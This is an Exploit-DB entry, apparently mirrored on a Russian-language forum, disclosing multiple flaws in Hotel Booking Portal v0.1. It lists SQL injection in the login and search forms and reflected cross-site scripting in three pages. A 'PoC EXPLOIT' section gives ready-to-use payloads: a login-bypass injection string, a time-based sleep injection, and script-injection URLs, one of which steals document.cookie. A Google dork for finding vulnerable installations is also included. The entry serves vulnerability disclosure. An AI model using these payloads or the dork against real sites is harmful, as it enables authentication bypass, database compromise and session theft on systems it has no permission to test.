- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 20476
- Проверка EDB
-
- Пройдено
- Автор
- YAKIR WIZMAN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2012-08-13
Код:
# -----------------------------------------------------------
# _____ _ _ _ _
# / ____(_) | | | | |
# | | _| |_ __ _ __| | ___| |
# | | | | __/ _` |/ _` |/ _ \ |
# | |____| | || (_| | (_| | __/ |
# \_____|_|\__\__,_|\__,_|\___|_|
#
# -----------------------------------------------------------
# Hotel Booking Portal v0.1 Multiple Vulnerabilities
# Google dork: "Made And Powered By Hotels Portal"
# Bug discovered by Yakir Wizman, <[email protected]>
# Date 09/08/2012
# Download - http://sourceforge.net/projects/hbportal/
# ISRAEL
# -----------------------------------------------------------
# Author will be not responsible for any damage.
# -----------------------------------------------------------
# I. DESCRIPTION
# -----------------------------------------------------------
# 1). A vulnerability exists in 'login.php' - Allows for 'SQL injection' of the 'email' and 'password' POST parameters.
# 2). A vulnerability exists in 'searchresults.php' - Allows for 'SQL injection' of the 'country' POST parameter.
# 3). A vulnerability exists in 'includes/languagebar.php' - Allows for 'Cross site scripting' of the 'window.location' js
# 4). A vulnerability exists in 'administrator/login.php' - Allows for 'Cross site scripting' of the 'window.location' js
# 5). A vulnerability exists in 'index.php' - Allows for 'Cross site scripting' of the 'lang' GET parameter.
#
# -----------------------------------------------------------
# II. PoC EXPLOIT
# -----------------------------------------------------------
# 1). POST a form to login.php with the value of:
# email set to : ' or '1'='1
# password set to : ' or '1'='1
# 2). POST to searchresults.php with the value of 'country' set to Armenia' and sleep(1)='
# 3). http://127.0.0.1/hbportal/includes/languagebar.php?xss=";</script><script>alert(1);</script><script>
# 4). http://127.0.0.1/hbportal/administrator/login.php?xss=";</script><script>alert(1);</script><script>
# 5). http://127.0.0.1/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script>
# -----------------------------------------------------------
- Источник
- www.exploit-db.com